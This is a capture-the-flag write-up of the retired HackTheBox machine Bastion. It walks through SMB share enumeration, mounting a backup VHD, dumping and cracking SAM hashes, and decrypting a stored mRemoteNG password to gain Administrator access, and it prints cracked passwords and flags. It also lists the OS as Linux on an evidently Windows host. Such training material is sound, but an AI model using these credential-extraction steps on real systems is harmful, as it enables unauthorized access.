Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Machine Info

Bastion by L4mpje
IP: 10.10.10.134
OS: linux

Recon

Nmap

As usual, we kick off with an Nmap scan.

$ nmap -v -p- -T3 -oN nmap-tcp-allports 10.10.10.134
 Nmap scan report for 10.10.10.134
 Host is up (0.028s latency).
 Not shown: 65522 closed ports
 PORT      STATE SERVICE
 22/tcp    open  ssh
 135/tcp   open  msrpc
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 5985/tcp  open  wsman
 47001/tcp open  winrm
 49664/tcp open  unknown
 49665/tcp open  unknown
 49666/tcp open  unknown
 49667/tcp open  unknown
 49668/tcp open  unknown
 49669/tcp open  unknown
 49670/tcp open  unknown

I run Nmap with the following parameters:

  • -v: run verbose (show more output)
  • -p-: scan all ports, equals 1-65535
  • -T3: run on normal speed (can be omitted, since this is the default speed)
  • -oN nmap-tcp-allports: save output in normal format with said filename
  • 10.10.10.134: host to scan

Note that SSH and SMB are exposed, as well as some other irrelevant services.

SMB

Let’s check whether we can find some open shares.

$ nmap --script smb-enum-shares -p 139,445 10.10.10.134
 Nmap scan report for 10.10.10.134
 Host is up (0.026s latency).
 PORT  STATE SERVICE
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 Host script results:
 | smb-enum-shares: 
 |  account_used: guest
 |  \\10.10.10.134\ADMIN$: 
 |   Type: STYPE_DISKTREE_HIDDEN
 |   Comment: Remote Admin
 |   Anonymous access: 
 |   Current user access: 
 |  \\10.10.10.134\Backups: 
 |   Type: STYPE_DISKTREE
 |   Comment: 
 |   Anonymous access: 
 |   Current user access: READ
 |  \\10.10.10.134\C$: 
 |   Type: STYPE_DISKTREE_HIDDEN
 |   Comment: Default share
 |   Anonymous access: 
 |   Current user access: 
 |  \\10.10.10.134\IPC$: 
 |   Type: STYPE_IPC_HIDDEN
 |   Comment: Remote IPC
 |   Anonymous access: 
 |_  Current user access: READ/WRITE

As you can see, the guest account has read access on the Backups share. This sounds like something worth investigating further.
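The same finding can be pulled out of the scan output automatically when auditing your own hosts. The following is an added example, not part of the original write-up: it parses smb-enum-shares output and reports disk shares the scan account could access. The sample text is constructed, and the function names are hypothetical.

```python
import re

# Constructed sample in the layout nmap's smb-enum-shares script prints.
SAMPLE = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.134\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.134\Backups:
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.10.10.134\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
"""

SHARE_RE = re.compile(r"^\|[_ ]\s*\\{1,2}[^\\]+\\(?P<name>[^\\]+):\s*$")
FIELD_RE = re.compile(r"^\|[_ ]\s*(?P<key>[A-Za-z_ ]+?):\s*(?P<val>.*)$")

def parse_shares(text):
    """Return (account_used, {share: {field: value}}) from the script output."""
    account, shares, current = None, {}, None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:  # a "\\host\share:" line starts a new share block
            current = shares.setdefault(m.group("name"), {})
            continue
        m = FIELD_RE.match(line)
        if m and m.group("key") == "account_used":
            account = m.group("val").strip()
        elif m and current is not None:
            val = m.group("val").strip()
            current[m.group("key")] = "" if val == "<none>" else val
    return account, shares

def exposed_disk_shares(text):
    """Disk shares that the unauthenticated scan account could read or write."""
    account, shares = parse_shares(text)
    findings = []
    for name, f in shares.items():
        access = f.get("Current user access") or f.get("Anonymous access")
        # IPC$ is skipped: only STYPE_DISKTREE* entries expose files.
        if f.get("Type", "").startswith("STYPE_DISKTREE") and access:
            findings.append((name, account, access))
    return findings
```
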

$ sudo smbmap -s Backups -R -H 10.10.10.134 -u guest | tee -a smbmap
 [+] Finding open SMB ports….
 [+] User SMB session establishd on 10.10.10.134…
 [+] IP: 10.10.10.134:445    Name: 10.10.10.134                    
 Disk                         Permissions
 ----                         -----------
 Backups                      READ, WRITE
 [!] Unable to remove test directory at \\10.10.10.134\Backups\tzRrGnGVfe, plreae remove manually
 .\
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    .
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    ..
 -r--r--r--       260 Fri Aug 2 11:00:50 2019    nmap-test-file
 -w--w--w--       116 Tue Apr 16 13:43:19 2019    note.txt
 -r--r--r--        0 Fri Feb 22 13:43:28 2019    SDT65CB.tmp
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    tzRrGnGVfe
 dr--r--r--        0 Fri Feb 22 13:44:02 2019    WindowsImageBackup
 [ ... ]
 .\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\
 dr--r--r--        0 Fri Feb 22 13:45:32 2019    .
 dr--r--r--        0 Fri Feb 22 13:45:32 2019    ..
 -r--r--r--        37761024 Fri Feb 22 13:44:03 2019    9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
 -r--r--r--        5418299392 Fri Feb 22 13:45:32 2019    9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
 -r--r--r--       1186 Fri Feb 22 13:45:32 2019    BackupSpecs.xml
 [ ... ]

Opening note.txt, you’ll find another clue on how you may want to continue.

$ smbclient //10.10.10.134/Backups -U guest
smb: \> dir
smb: \> get note.txt
smb: \> exit

$ cat note.txt
 Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

So we want to have a look at the back-ups.

Analysing the back-ups

The small back-up file ‘9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd’ is a recovery image, which Windows usually creates when you create a back-up image.

The interesting image however is ‘9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd’. As the note said, downloading this file might fail. In my case I was never able to download more than 75% of the vhd using the get command in smbclient.

What worked for me is adding the share as a remote disk and using rsync to copy the image to my system (as rsync allows you to continue failed downloads) for analysis.
However, there are tools available which’ll allow you to browse through an image without having to download the whole image to your disk.

$ sudo mkdir /mnt/vhd
$ sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/vhd/
$ cd /mnt/vhd/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/
$ rsync --append 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo umount /mnt/vhd
$ cd  ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo vhdimount 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd /mnt/vhd/
$ cd /mnt/vhd/
$ ls
$ mmls -aB vhdi1
 DOS Partition Table
 Offset Sector: 0
 Units are in 512-byte sectors
 Slot   Start    End     Length    Size  Description
 002: 000:000  0000000128  0031248511  0031248384  0014G  NTFS / exFAT (0x07)
$ echo 128*512 | bc
 65536
$ sudo mkdir /mnt/dd
$ sudo mount -o ro,noload,offset=65536 -t ntfs vhdi1 /mnt/dd

We can now browse through the contents of the image.
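The offset passed to mount comes straight from the DOS partition table in the first sector of the image. The following is an added example, not part of the original write-up: it parses that table the way mmls does and derives the byte offset. It assumes 512-byte sectors as reported above, and the sample sector is constructed from the mmls values rather than read from the real image.

```python
import struct
import sys

SECTOR = 512  # mmls reported 512-byte sectors for this image

def parse_mbr(sector0: bytes):
    """Return the non-empty primary partitions of a DOS/MBR partition table."""
    if len(sector0) < SECTOR or sector0[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature: not an MBR")
    parts = []
    for slot in range(4):
        entry = sector0[446 + 16 * slot: 446 + 16 * (slot + 1)]
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4, LE) sectors(4, LE)
        status, ptype, start, count = struct.unpack("<B3xB3xII", entry)
        if ptype == 0 or count == 0:
            continue  # unused table slot
        parts.append({"slot": slot, "type": ptype, "bootable": status == 0x80,
                      "start": start, "end": start + count - 1,
                      "sectors": count, "offset": start * SECTOR})
    return parts

def build_sample_mbr():
    """Constructed sector 0 matching the mmls output above (not the real image)."""
    mbr = bytearray(SECTOR)
    # One NTFS/exFAT (0x07) partition: start sector 128, length 31248384 sectors.
    mbr[446:462] = struct.pack("<B3xB3xII", 0x00, 0x07, 128, 31248384)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)

if __name__ == "__main__":
    # Pass a raw image path (e.g. vhdi1) or run without arguments for the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read(SECTOR)
    else:
        data = build_sample_mbr()
    for p in parse_mbr(data):
        print(f"slot {p['slot']}: type 0x{p['type']:02x} start {p['start']} "
              f"end {p['end']} -> mount -o ro,offset={p['offset']}")
```
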

Cracking hashes

I start off by looking for password hashes.
These can be extracted from the SAM (Security Account Manager) file, which is located at C:\Windows\System32\config alongside the SYSTEM file that samdump2 also needs.

$ cd /mnt/dd/Windows/System32/config/
$ samdump2 SYSTEM SAM > ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
$ cat ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
 *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

$ hashcat -m 1000 -a 0 SAM-hashes.txt
$ cat ~/.hashcat/hashcat.potfile
 26112010952d963c8dc4217daec986d9:bureaulampje

We now have the password of the user L4mpje (“lampje” = “small lightbulb” in Dutch), which is bureaulampje (“small desk lamp” in Dutch).

Got the user flag

I use this password to SSH onto the box and find the users.txt file containing the flag on the user’s desktop.

$ ssh L4mpje@10.10.10.134 # enter password bureaulampje
L4mpje@BASTION C:\Users\L4mpje> type C:\Users\L4mpje\Desktop\users.txt
 9bfe57d5c3309db3a151772f9d86c6cd

Going for the root flag

While browsing through the filesystem, I noticed mRemoteNG was installed.
This is also confirmed by running this small line of PowerShell:

L4mpje@BASTION C:\Users\L4mpje\Downloads> powershell
PS C:\Users\L4mpje\Downloads> Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize

DisplayName                                                    DisplayVersion Publisher                InstallDate              
-----------                                                    -------------- ---------                -----------              
mRemoteNG                                                      1.76.11.40527  Next Generation Software 20190222                 
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 Microsoft Corporation    20190416

Searching for vulnerabilities on exploit-db didn’t reveal anything, but a quick Google search did bring me to an interesting Reddit post.
The Ruby script in the post didn’t seem to work for me, but I finally found a Python script on GitHub which did.

I downloaded confCons.xml from the host and ran the script to find the password for the Administrator account. I then logged in to the host using the Administrator password to retrieve the flag from the Administrator’s desktop.

$ scp -T L4mpje@10.10.10.134:"C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml" ./
$ cat confCons.xml
$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
 Password: thXLHM96BeKL0ER2

$ ssh Administrator@10.10.10.134
administrator@BASTION C:\Users\Administrator> type Desktop\root.txt
 958850b91811676ed6620a9c430e65c8

Whatever you are, be a good one.
~ Abraham Lincoln